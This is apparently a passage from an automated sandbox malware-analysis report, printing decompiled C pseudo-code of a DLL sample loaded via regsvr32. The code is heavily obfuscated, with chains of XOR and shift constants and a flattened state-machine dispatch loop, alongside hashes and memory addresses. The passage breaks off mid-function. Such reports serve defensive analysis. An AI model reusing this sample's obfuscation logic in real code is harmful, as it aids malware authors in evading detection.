                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $BO$DZs/$IeO$RHf$T($`$qNv$v
                                                                                                                • API String ID: 0-3631915167
                                                                                                                • Opcode ID: 92e239ade607393e425f5dba0ea291aa626a443c41db43d432ee5a7c7039a24a
                                                                                                                • Instruction ID: 15db849e33d21f34b30541b78871690ad21d485cb6fdbdcdf78ee8e48f3213c8
                                                                                                                • Opcode Fuzzy Hash: 92e239ade607393e425f5dba0ea291aa626a443c41db43d432ee5a7c7039a24a
                                                                                                                • Instruction Fuzzy Hash: BE2222B15083809FD368CF25C48AA9BFBE1FBD5344F108A1DE6DA86261D7B18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001A4313() {
                                                                                                                				void* _t369;
                                                                                                                				signed int _t371;
                                                                                                                				signed int _t372;
                                                                                                                				intOrPtr _t374;
                                                                                                                				signed int _t376;
                                                                                                                				signed int _t378;
                                                                                                                				signed int _t389;
                                                                                                                				signed int _t394;
                                                                                                                				void* _t398;
                                                                                                                				signed int _t435;
                                                                                                                				signed int _t438;
                                                                                                                				signed int _t439;
                                                                                                                				signed int _t440;
                                                                                                                				signed int _t441;
                                                                                                                				signed int _t442;
                                                                                                                				signed int _t443;
                                                                                                                				signed int _t444;
                                                                                                                				signed int _t445;
                                                                                                                				signed int _t447;
                                                                                                                				void* _t451;
                                                                                                                
                                                                                                                				 *((intOrPtr*)(_t451 + 0xa0)) = 0x481ee2;
                                                                                                                				 *(_t451 + 0xa8) =  *(_t451 + 0xa8) & 0x00000000;
                                                                                                                				asm("stosd");
                                                                                                                				_t438 = 0x5a;
                                                                                                                				asm("stosd");
                                                                                                                				_t398 = 0xda67f00;
                                                                                                                				asm("stosd");
                                                                                                                				 *(_t451 + 0xa4) = 0xbf1562;
                                                                                                                				 *(_t451 + 0xa4) =  *(_t451 + 0xa4) >> 0x10;
                                                                                                                				 *(_t451 + 0xa4) =  *(_t451 + 0xa4) ^ 0x000000be;
                                                                                                                				 *(_t451 + 0x48) = 0xb2e312;
                                                                                                                				 *(_t451 + 0x48) =  *(_t451 + 0x48) / _t438;
                                                                                                                				_t439 = 0x7a;
                                                                                                                				 *(_t451 + 0x48) =  *(_t451 + 0x48) / _t439;
                                                                                                                				 *(_t451 + 0x48) =  *(_t451 + 0x48) ^ 0x0000042a;
                                                                                                                				 *(_t451 + 0x4c) = 0xaab8a4;
                                                                                                                				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) + 0xd870;
                                                                                                                				_t440 = 0x78;
                                                                                                                				 *(_t451 + 0x48) =  *(_t451 + 0x4c) * 0x5d;
                                                                                                                				 *(_t451 + 0x48) =  *(_t451 + 0x48) ^ 0x3e53b447;
                                                                                                                				 *(_t451 + 0x24) = 0x35a539;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x02c100d7;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) * 0x3f;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) << 0xc;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x4d5183e4;
                                                                                                                				 *(_t451 + 0x64) = 0x926655;
                                                                                                                				 *(_t451 + 0x64) =  *(_t451 + 0x64) + 0x74d8;
                                                                                                                				 *(_t451 + 0x64) =  *(_t451 + 0x64) ^ 0x6016a5fc;
                                                                                                                				 *(_t451 + 0x64) =  *(_t451 + 0x64) ^ 0x60895938;
                                                                                                                				 *(_t451 + 0x2c) = 0xd6cba1;
                                                                                                                				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) >> 0xa;
                                                                                                                				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) | 0x6c405702;
                                                                                                                				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) + 0x6e69;
                                                                                                                				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) ^ 0x6c45778b;
                                                                                                                				 *(_t451 + 0x88) = 0xaa579a;
                                                                                                                				 *(_t451 + 0x88) =  *(_t451 + 0x88) + 0xf061;
                                                                                                                				 *(_t451 + 0x88) =  *(_t451 + 0x88) ^ 0x00a76d8e;
                                                                                                                				 *(_t451 + 0x74) = 0x9e8235;
                                                                                                                				 *(_t451 + 0x74) =  *(_t451 + 0x74) + 0xffff828c;
                                                                                                                				 *(_t451 + 0x74) =  *(_t451 + 0x74) | 0x86deb096;
                                                                                                                				 *(_t451 + 0x74) =  *(_t451 + 0x74) ^ 0x86d8bdb3;
                                                                                                                				 *(_t451 + 0x54) = 0xf5a295;
                                                                                                                				 *(_t451 + 0x54) =  *(_t451 + 0x54) + 0x2fae;
                                                                                                                				 *(_t451 + 0x54) =  *(_t451 + 0x54) / _t440;
                                                                                                                				 *(_t451 + 0x54) =  *(_t451 + 0x54) ^ 0x000c86a2;
                                                                                                                				 *(_t451 + 0x98) = 0xad9eaa;
                                                                                                                				 *(_t451 + 0x98) =  *(_t451 + 0x98) * 0x4f;
                                                                                                                				 *(_t451 + 0x98) =  *(_t451 + 0x98) ^ 0x359a584e;
                                                                                                                				 *(_t451 + 0x1c) = 0x9df989;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) + 0xffff10d5;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) >> 1;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) + 0xffffab5d;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) ^ 0x0040b406;
                                                                                                                				 *(_t451 + 0x34) = 0x3a80a9;
                                                                                                                				 *(_t451 + 0x34) =  *(_t451 + 0x34) << 4;
                                                                                                                				 *(_t451 + 0x34) =  *(_t451 + 0x34) << 2;
                                                                                                                				 *(_t451 + 0x34) =  *(_t451 + 0x34) >> 0x10;
                                                                                                                				 *(_t451 + 0x34) =  *(_t451 + 0x34) ^ 0x000f81ac;
                                                                                                                				 *(_t451 + 0x4c) = 0xd0eab4;
                                                                                                                				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) ^ 0xf9224d3f;
                                                                                                                				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) ^ 0xc93cfb98;
                                                                                                                				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) ^ 0x30c06211;
                                                                                                                				 *(_t451 + 0x14) = 0xd7baa6;
                                                                                                                				 *(_t451 + 0x14) =  *(_t451 + 0x14) ^ 0x9b1982f2;
                                                                                                                				 *(_t451 + 0x14) =  *(_t451 + 0x14) + 0xffff3cb1;
                                                                                                                				 *(_t451 + 0x14) =  *(_t451 + 0x14) >> 0xd;
                                                                                                                				 *(_t451 + 0x14) =  *(_t451 + 0x14) ^ 0x00032c44;
                                                                                                                				 *(_t451 + 0x78) = 0xe4d0af;
                                                                                                                				_t441 = 0x42;
                                                                                                                				 *(_t451 + 0x7c) =  *(_t451 + 0x78) / _t441;
                                                                                                                				 *(_t451 + 0x7c) =  *(_t451 + 0x7c) << 5;
                                                                                                                				 *(_t451 + 0x7c) =  *(_t451 + 0x7c) ^ 0x0067e08b;
                                                                                                                				 *(_t451 + 0x84) = 0x3f4ae4;
                                                                                                                				 *(_t451 + 0x84) =  *(_t451 + 0x84) + 0x5ff4;
                                                                                                                				 *(_t451 + 0x84) =  *(_t451 + 0x84) ^ 0x00376670;
                                                                                                                				 *(_t451 + 0x94) = 0x4dfb72;
                                                                                                                				_t442 = 0x64;
                                                                                                                				 *(_t451 + 0x94) =  *(_t451 + 0x94) * 0x60;
                                                                                                                				 *(_t451 + 0x94) =  *(_t451 + 0x94) ^ 0x1d344795;
                                                                                                                				 *(_t451 + 0x1c) = 0xc30a93;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) << 6;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) + 0x66e3;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) << 0xe;
                                                                                                                				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) ^ 0xc2e8d13d;
                                                                                                                				 *(_t451 + 0x98) = 0x5304b3;
                                                                                                                				 *(_t451 + 0x98) =  *(_t451 + 0x98) << 0xc;
                                                                                                                				 *(_t451 + 0x98) =  *(_t451 + 0x98) ^ 0x30427672;
                                                                                                                				 *(_t451 + 0x70) = 0x179a69;
                                                                                                                				 *(_t451 + 0x70) =  *(_t451 + 0x70) + 0x35c0;
                                                                                                                				 *(_t451 + 0x70) =  *(_t451 + 0x70) * 0x5b;
                                                                                                                				 *(_t451 + 0x70) =  *(_t451 + 0x70) ^ 0x0876ade6;
                                                                                                                				 *(_t451 + 0x88) = 0xbc1111;
                                                                                                                				 *(_t451 + 0x88) =  *(_t451 + 0x88) << 0x10;
                                                                                                                				 *(_t451 + 0x88) =  *(_t451 + 0x88) ^ 0x111f6c12;
                                                                                                                				 *(_t451 + 0x24) = 0x8d085f;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) + 0xa827;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) + 0xf853;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x74c8cdbe;
                                                                                                                				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x7441d83e;
                                                                                                                				 *(_t451 + 0xa8) = 0x59286f;
                                                                                                                				 *(_t451 + 0xa8) =  *(_t451 + 0xa8) | 0xf263580b;
                                                                                                                				 *(_t451 + 0xa8) =  *(_t451 + 0xa8) ^ 0xf2718210;
                                                                                                                				 *(_t451 + 0x54) = 0xc438c7;
                                                                                                                				 *(_t451 + 0x54) =  *(_t451 + 0x54) / _t442;
                                                                                                                				_t443 = 0x3b;
                                                                                                                				 *(_t451 + 0x50) =  *(_t451 + 0x54) * 0x37;
                                                                                                                				 *(_t451 + 0x50) =  *(_t451 + 0x50) ^ 0x006e4e34;
                                                                                                                				 *(_t451 + 0x3c) = 0x907efd;
                                                                                                                				 *(_t451 + 0x3c) =  *(_t451 + 0x3c) >> 9;
                                                                                                                				 *(_t451 + 0x3c) =  *(_t451 + 0x3c) << 7;
                                                                                                                				 *(_t451 + 0x3c) =  *(_t451 + 0x3c) ^ 0x0029805f;
                                                                                                                				 *(_t451 + 0x9c) = 0xb00ef7;
                                                                                                                				 *(_t451 + 0x9c) =  *(_t451 + 0x9c) + 0xa0b3;
                                                                                                                				 *(_t451 + 0x9c) =  *(_t451 + 0x9c) ^ 0x00bd8a86;
                                                                                                                				 *(_t451 + 0x28) = 0x6076e2;
                                                                                                                				 *(_t451 + 0x28) =  *(_t451 + 0x28) | 0xceaeb24a;
                                                                                                                				 *(_t451 + 0x28) =  *(_t451 + 0x28) << 2;
                                                                                                                				 *(_t451 + 0x28) =  *(_t451 + 0x28) << 8;
                                                                                                                				 *(_t451 + 0x28) =  *(_t451 + 0x28) ^ 0xbbdaa60d;
                                                                                                                				 *(_t451 + 0x60) = 0x8d7874;
                                                                                                                				 *(_t451 + 0x60) =  *(_t451 + 0x60) | 0x627ab4a7;
                                                                                                                				 *(_t451 + 0x60) =  *(_t451 + 0x60) / _t443;
                                                                                                                				 *(_t451 + 0x60) =  *(_t451 + 0x60) ^ 0x01a5ba19;
                                                                                                                				 *(_t451 + 0x8c) = 0xb964e2;
                                                                                                                				 *(_t451 + 0x8c) =  *(_t451 + 0x8c) | 0x5710154c;
                                                                                                                				 *(_t451 + 0x8c) =  *(_t451 + 0x8c) ^ 0x57bba904;
                                                                                                                				 *(_t451 + 0x58) = 0x114838;
                                                                                                                				 *(_t451 + 0x58) =  *(_t451 + 0x58) << 8;
                                                                                                                				 *(_t451 + 0x58) =  *(_t451 + 0x58) + 0xffffe1fe;
                                                                                                                				 *(_t451 + 0x58) =  *(_t451 + 0x58) ^ 0x114e4f49;
                                                                                                                				 *(_t451 + 0x68) = 0x9b2ff3;
                                                                                                                				_t444 = 0x4a;
                                                                                                                				_t396 =  *(_t451 + 0x7c);
                                                                                                                				 *(_t451 + 0x68) =  *(_t451 + 0x68) / _t444;
                                                                                                                				 *(_t451 + 0x68) =  *(_t451 + 0x68) << 0xd;
                                                                                                                				 *(_t451 + 0x68) =  *(_t451 + 0x68) ^ 0x4310abae;
                                                                                                                				 *(_t451 + 0x30) = 0x75df9f;
                                                                                                                				 *(_t451 + 0x30) =  *(_t451 + 0x30) | 0x77fbbb7f;
                                                                                                                				 *(_t451 + 0x30) =  *(_t451 + 0x30) ^ 0x9a588fec;
                                                                                                                				 *(_t451 + 0x30) =  *(_t451 + 0x30) ^ 0xeda39833;
                                                                                                                				 *(_t451 + 0x5c) = 0x8b5b73;
                                                                                                                				 *(_t451 + 0x5c) =  *(_t451 + 0x5c) + 0x2955;
                                                                                                                				 *(_t451 + 0x5c) =  *(_t451 + 0x5c) << 0xb;
                                                                                                                				 *(_t451 + 0x5c) =  *(_t451 + 0x5c) ^ 0x5c21f1b7;
                                                                                                                				 *(_t451 + 0x10) = 0xfa7ab0;
                                                                                                                				 *(_t451 + 0x10) =  *(_t451 + 0x10) << 0xe;
                                                                                                                				 *(_t451 + 0x10) =  *(_t451 + 0x10) + 0xffffc644;
                                                                                                                				 *(_t451 + 0x10) =  *(_t451 + 0x10) + 0xffffc27f;
                                                                                                                				 *(_t451 + 0x10) =  *(_t451 + 0x10) ^ 0x9eaad59e;
                                                                                                                				 *(_t451 + 0x38) = 0xc66bc1;
                                                                                                                				 *(_t451 + 0x38) =  *(_t451 + 0x38) + 0xffff1251;
                                                                                                                				_t435 =  *(_t451 + 0x7c);
                                                                                                                				_t449 =  *(_t451 + 0x7c);
                                                                                                                				_t445 =  *(_t451 + 0x7c);
                                                                                                                				 *(_t451 + 0x38) =  *(_t451 + 0x38) * 0x35;
                                                                                                                				 *(_t451 + 0x38) =  *(_t451 + 0x38) + 0xb26f;
                                                                                                                				 *(_t451 + 0x38) =  *(_t451 + 0x38) ^ 0x28eaa94f;
                                                                                                                				 *(_t451 + 0x40) = 0x426fa7;
                                                                                                                				 *(_t451 + 0x40) =  *(_t451 + 0x40) + 0xffffb5fe;
                                                                                                                				 *(_t451 + 0x40) =  *(_t451 + 0x40) + 0x2061;
                                                                                                                				 *(_t451 + 0x40) =  *(_t451 + 0x40) ^ 0x0046db62;
                                                                                                                				 *(_t451 + 0x70) = 0x509d7a;
                                                                                                                				 *(_t451 + 0x70) =  *(_t451 + 0x70) * 0x29;
                                                                                                                				 *(_t451 + 0x70) =  *(_t451 + 0x70) ^ 0x122873ad;
                                                                                                                				 *(_t451 + 0x70) =  *(_t451 + 0x70) ^ 0x1eceaae2;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t369 = 0x46a5dd8;
                                                                                                                					do {
                                                                                                                						L2:
                                                                                                                						while(_t398 != _t369) {
                                                                                                                							if(_t398 == 0x5ae9815) {
                                                                                                                								_t445 = 0x1000;
                                                                                                                								_push(_t398);
                                                                                                                								 *(_t451 + 0x88) = 0x1000;
                                                                                                                								_t435 = E001A303A(_t398, 0x1000);
                                                                                                                								_t451 = _t451 + 0xc;
                                                                                                                								__eflags = _t435;
                                                                                                                								_t369 = 0x46a5dd8;
                                                                                                                								_t398 =  !=  ? 0x46a5dd8 : 0xb2df5d2;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t398 == 0xb17a6c0) {
                                                                                                                									E001B17D2( *(_t451 + 0x5c),  *(_t451 + 0x10), _t435);
                                                                                                                									_t398 = 0xb2df5d2;
                                                                                                                									while(1) {
                                                                                                                										L1:
                                                                                                                										_t369 = 0x46a5dd8;
                                                                                                                										goto L2;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(_t398 == 0xb2df5d2) {
                                                                                                                										E001B02D8(_t396,  *(_t451 + 0x40),  *((intOrPtr*)(_t451 + 0x44)),  *(_t451 + 0x70));
                                                                                                                									} else {
                                                                                                                										if(_t398 == 0xca7cecc) {
                                                                                                                											E001C0575( *(_t451 + 0x30),  *(_t451 + 0x68), __eflags, _t398, _t451 + 0xc4,  *(_t451 + 0x2c));
                                                                                                                											_t312 = _t451 + 0x84; // 0x376670
                                                                                                                											_t389 = E001A2263(_t451 + 0xd0,  *(_t451 + 0x9c),  *_t312,  *(_t451 + 0x60));
                                                                                                                											_t449 = _t389;
                                                                                                                											_t451 = _t451 + 0x14;
                                                                                                                											_t398 = 0xebe567b;
                                                                                                                											 *((short*)(_t389 - 2)) = 0;
                                                                                                                											while(1) {
                                                                                                                												L1:
                                                                                                                												_t369 = 0x46a5dd8;
                                                                                                                												goto L2;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											if(_t398 == 0xda67f00) {
                                                                                                                												_t398 = 0xca7cecc;
                                                                                                                												continue;
                                                                                                                											} else {
                                                                                                                												if(_t398 != 0xebe567b) {
                                                                                                                													goto L28;
                                                                                                                												} else {
                                                                                                                													_t297 = _t451 + 0x84; // 0x376670
                                                                                                                													_t394 = E001BA50A( *((intOrPtr*)(_t451 + 0xc8)),  *(_t451 + 0x74),  *((intOrPtr*)(_t451 + 0x44)),  *(_t451 + 0x58), 0x2000000,  *(_t451 + 0x68),  *(_t451 + 0x2c), 1, _t398,  *(_t451 + 0x84),  *(_t451 + 0x4c) | 0x00000006,  *_t297, _t451 + 0xc0);
                                                                                                                													_t396 = _t394;
                                                                                                                													_t451 = _t451 + 0x30;
                                                                                                                													if(_t394 != 0xffffffff) {
                                                                                                                														_t398 = 0x5ae9815;
                                                                                                                														while(1) {
                                                                                                                															L1:
                                                                                                                															_t369 = 0x46a5dd8;
                                                                                                                															goto L2;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L31:
                                                                                                                							__eflags = 0;
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						_t371 = E001BEB61( *((intOrPtr*)(_t451 + 0xb4)),  *(_t451 + 0x50),  *((intOrPtr*)(_t451 + 0xcc)), _t445, _t451 + 0xb0, _t435,  *((intOrPtr*)(_t451 + 0xc0)),  *(_t451 + 0x68), _t398,  *(_t451 + 0x4c), _t396, _t398, _t398,  *(_t451 + 0x9c));
                                                                                                                						_t451 = _t451 + 0x30;
                                                                                                                						__eflags = _t371;
                                                                                                                						if(_t371 == 0) {
                                                                                                                							_t372 =  *(_t451 + 0xa8);
                                                                                                                						} else {
                                                                                                                							_t447 = _t435;
                                                                                                                							while(1) {
                                                                                                                								__eflags =  *((intOrPtr*)(_t447 + 4)) - 4;
                                                                                                                								if( *((intOrPtr*)(_t447 + 4)) != 4) {
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                								L18:
                                                                                                                								_t332 = _t447 + 0xc; // 0x67e097
                                                                                                                								_t378 = E001ABEE4( *(_t451 + 0x34),  *((intOrPtr*)(_t451 + 0x6c)), _t332,  *(_t451 + 0x94), _t449,  *(_t451 + 0x58));
                                                                                                                								_t451 = _t451 + 0x10;
                                                                                                                								__eflags = _t378;
                                                                                                                								if(_t378 == 0) {
                                                                                                                									_t372 = 1;
                                                                                                                									 *(_t451 + 0xa8) = 1;
                                                                                                                								} else {
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                								L24:
                                                                                                                								_t445 =  *(_t451 + 0x7c);
                                                                                                                								goto L25;
                                                                                                                								L19:
                                                                                                                								_t376 =  *_t447;
                                                                                                                								__eflags = _t376;
                                                                                                                								if(_t376 == 0) {
                                                                                                                									_t372 =  *(_t451 + 0xa8);
                                                                                                                								} else {
                                                                                                                									_t447 = _t447 + _t376;
                                                                                                                									__eflags =  *((intOrPtr*)(_t447 + 4)) - 4;
                                                                                                                									if( *((intOrPtr*)(_t447 + 4)) != 4) {
                                                                                                                										goto L19;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L24;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L25:
                                                                                                                						__eflags = _t372;
                                                                                                                						if(_t372 == 0) {
                                                                                                                							_t369 = 0x46a5dd8;
                                                                                                                							_t398 = 0x46a5dd8;
                                                                                                                							goto L28;
                                                                                                                						} else {
                                                                                                                							_t374 =  *0x1c4c14; // 0x0
                                                                                                                							E001B487B( *(_t451 + 0x68),  *(_t451 + 0x30),  *((intOrPtr*)(_t374 + 0x1c)));
                                                                                                                							_t398 = 0xb17a6c0;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L31;
                                                                                                                						L28:
                                                                                                                						__eflags = _t398 - 0x16de6b2;
                                                                                                                					} while (__eflags != 0);
                                                                                                                					goto L31;
                                                                                                                				}
                                                                                                                			}























                                                                                                                0x001a4a16
                                                                                                                0x001a4a16
                                                                                                                0x001a4a18
                                                                                                                0x001a4a1a
                                                                                                                0x001a4a35
                                                                                                                0x001a4a1c
                                                                                                                0x001a4a1c
                                                                                                                0x001a49ec
                                                                                                                0x001a49f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a49f0
                                                                                                                0x00000000
                                                                                                                0x001a4a1a
                                                                                                                0x001a49ec
                                                                                                                0x001a4a40
                                                                                                                0x001a4a40
                                                                                                                0x001a4a42
                                                                                                                0x001a4a64
                                                                                                                0x001a4a69
                                                                                                                0x00000000
                                                                                                                0x001a4a44
                                                                                                                0x001a4a44
                                                                                                                0x001a4a54
                                                                                                                0x001a4a5a
                                                                                                                0x00000000
                                                                                                                0x001a4a5a
                                                                                                                0x00000000
                                                                                                                0x001a4a6b
                                                                                                                0x001a4a6b
                                                                                                                0x001a4a6b
                                                                                                                0x00000000
                                                                                                                0x001a4a77

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: 4Nn$U)$a $in$o(Y$pf7$rvB0$f$v`
                                                                                                                • API String ID: 2962429428-3925418858
                                                                                                                • Opcode ID: a6f9b21d7378f3e9ed87a34ea381f4048454587f0797339b73997999416b7569
                                                                                                                • Instruction ID: 26e3af096168f308c65bdd10acf6ee83e87b7eed4b52d3fa748a55e110a9933b
                                                                                                                • Opcode Fuzzy Hash: a6f9b21d7378f3e9ed87a34ea381f4048454587f0797339b73997999416b7569
                                                                                                                • Instruction Fuzzy Hash: 7B023071508380DFD368CF65C98AA5BFBE1FBC5758F10891DE2AA86260D7B48949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001AAEBB(void* __ecx) {
                                                                                                                				char _v524;
                                                                                                                				char _v1044;
                                                                                                                				char _v1564;
                                                                                                                				signed int _v1568;
                                                                                                                				intOrPtr _v1572;
                                                                                                                				intOrPtr _v1584;
                                                                                                                				char _v1588;
                                                                                                                				signed int _v1592;
                                                                                                                				signed int _v1596;
                                                                                                                				signed int _v1600;
                                                                                                                				signed int _v1604;
                                                                                                                				signed int _v1608;
                                                                                                                				signed int _v1612;
                                                                                                                				signed int _v1616;
                                                                                                                				signed int _v1620;
                                                                                                                				signed int _v1624;
                                                                                                                				signed int _v1628;
                                                                                                                				signed int _v1632;
                                                                                                                				signed int _v1636;
                                                                                                                				signed int _v1640;
                                                                                                                				signed int _v1644;
                                                                                                                				signed int _v1648;
                                                                                                                				signed int _v1652;
                                                                                                                				signed int _v1656;
                                                                                                                				signed int _v1660;
                                                                                                                				signed int _v1664;
                                                                                                                				signed int _v1668;
                                                                                                                				signed int _v1672;
                                                                                                                				signed int _v1676;
                                                                                                                				signed int _v1680;
                                                                                                                				signed int _v1684;
                                                                                                                				signed int _v1688;
                                                                                                                				signed int _v1692;
                                                                                                                				signed int _v1696;
                                                                                                                				signed int _v1700;
                                                                                                                				signed int _v1704;
                                                                                                                				signed int _v1708;
                                                                                                                				signed int _v1712;
                                                                                                                				signed int _v1716;
                                                                                                                				signed int _v1720;
                                                                                                                				signed int _v1724;
                                                                                                                				signed int _v1728;
                                                                                                                				signed int _v1732;
                                                                                                                				signed int _v1736;
                                                                                                                				signed int _v1740;
                                                                                                                				signed int _v1744;
                                                                                                                				signed int _v1748;
                                                                                                                				signed int _v1752;
                                                                                                                				signed int _v1756;
                                                                                                                				signed int _v1760;
                                                                                                                				signed int _v1764;
                                                                                                                				signed int _v1768;
                                                                                                                				signed int _v1772;
                                                                                                                				unsigned int _v1776;
                                                                                                                				signed int _v1780;
                                                                                                                				signed int _v1784;
                                                                                                                				signed int _v1788;
                                                                                                                				signed int _v1792;
                                                                                                                				signed int _v1796;
                                                                                                                				signed int _v1800;
                                                                                                                				signed int _v1804;
                                                                                                                				signed int _v1808;
                                                                                                                				signed int _v1812;
                                                                                                                				void* _t539;
                                                                                                                				void* _t541;
                                                                                                                				void* _t543;
                                                                                                                				void* _t549;
                                                                                                                				void* _t560;
                                                                                                                				void* _t561;
                                                                                                                				signed int _t563;
                                                                                                                				signed int _t564;
                                                                                                                				signed int _t565;
                                                                                                                				signed int _t566;
                                                                                                                				signed int _t567;
                                                                                                                				signed int _t568;
                                                                                                                				signed int _t569;
                                                                                                                				signed int _t570;
                                                                                                                				signed int _t571;
                                                                                                                				signed int _t572;
                                                                                                                				signed int _t573;
                                                                                                                				signed int _t574;
                                                                                                                				void* _t575;
                                                                                                                				signed int _t631;
                                                                                                                				void* _t633;
                                                                                                                				signed int* _t638;
                                                                                                                
                                                                                                                				_t638 =  &_v1812;
                                                                                                                				_v1568 = _v1568 & 0x00000000;
                                                                                                                				_v1592 = _v1592 & 0x00000000;
                                                                                                                				_v1572 = 0x68e3db;
                                                                                                                				_v1664 = 0x610915;
                                                                                                                				_v1664 = _v1664 << 0xc;
                                                                                                                				_v1664 = _v1664 ^ 0x12915000;
                                                                                                                				_v1616 = 0x697c94;
                                                                                                                				_v1616 = _v1616 + 0xa67e;
                                                                                                                				_v1616 = _v1616 ^ 0x00612c99;
                                                                                                                				_v1776 = 0xe52c1a;
                                                                                                                				_v1776 = _v1776 >> 0xd;
                                                                                                                				_v1776 = _v1776 + 0x7cde;
                                                                                                                				_v1776 = _v1776 + 0xffffa36c;
                                                                                                                				_v1776 = _v1776 ^ 0x0006cca4;
                                                                                                                				_v1704 = 0xaa56f;
                                                                                                                				_t561 = __ecx;
                                                                                                                				_t633 = 0x9693e9c;
                                                                                                                				_t563 = 0x4c;
                                                                                                                				_v1704 = _v1704 / _t563;
                                                                                                                				_t564 = 0x25;
                                                                                                                				_v1704 = _v1704 * 0x43;
                                                                                                                				_v1704 = _v1704 ^ 0x000dab72;
                                                                                                                				_v1656 = 0xc2af88;
                                                                                                                				_v1656 = _v1656 | 0x26503769;
                                                                                                                				_v1656 = _v1656 ^ 0x26d30127;
                                                                                                                				_v1716 = 0x3ba327;
                                                                                                                				_v1716 = _v1716 + 0xffff84a8;
                                                                                                                				_v1716 = _v1716 * 0x68;
                                                                                                                				_v1716 = _v1716 ^ 0x180fd7cb;
                                                                                                                				_v1780 = 0xee69dd;
                                                                                                                				_v1780 = _v1780 << 6;
                                                                                                                				_t565 = 0x50;
                                                                                                                				_v1780 = _v1780 / _t564;
                                                                                                                				_v1780 = _v1780 * 0x46;
                                                                                                                				_v1780 = _v1780 ^ 0x70cc70b2;
                                                                                                                				_v1736 = 0x13adce;
                                                                                                                				_t566 = 0x1c;
                                                                                                                				_v1736 = _v1736 / _t565;
                                                                                                                				_v1736 = _v1736 >> 9;
                                                                                                                				_v1736 = _v1736 ^ 0x0003a8fb;
                                                                                                                				_v1596 = 0xce22a8;
                                                                                                                				_v1596 = _v1596 + 0x3740;
                                                                                                                				_v1596 = _v1596 ^ 0x00cad873;
                                                                                                                				_v1764 = 0xc24fa7;
                                                                                                                				_v1764 = _v1764 | 0xf3ffef7f;
                                                                                                                				_v1764 = _v1764 ^ 0xf3fae66a;
                                                                                                                				_v1672 = 0xc77ded;
                                                                                                                				_v1672 = _v1672 >> 6;
                                                                                                                				_v1672 = _v1672 | 0x1d847990;
                                                                                                                				_v1672 = _v1672 ^ 0x1d8cae63;
                                                                                                                				_v1804 = 0x2b6435;
                                                                                                                				_t90 =  &_v1804; // 0x2b6435
                                                                                                                				_v1804 =  *_t90 / _t566;
                                                                                                                				_t567 = 0x53;
                                                                                                                				_v1804 = _v1804 * 0x3d;
                                                                                                                				_t98 =  &_v1804; // 0x2b6435
                                                                                                                				_v1804 =  *_t98 / _t567;
                                                                                                                				_v1804 = _v1804 ^ 0x000097bc;
                                                                                                                				_v1648 = 0x90188;
                                                                                                                				_v1648 = _v1648 + 0xc58;
                                                                                                                				_v1648 = _v1648 ^ 0x000a1232;
                                                                                                                				_v1788 = 0x9a20f4;
                                                                                                                				_v1788 = _v1788 << 8;
                                                                                                                				_v1788 = _v1788 + 0xac97;
                                                                                                                				_v1788 = _v1788 << 4;
                                                                                                                				_v1788 = _v1788 ^ 0xa215eae8;
                                                                                                                				_v1772 = 0x178759;
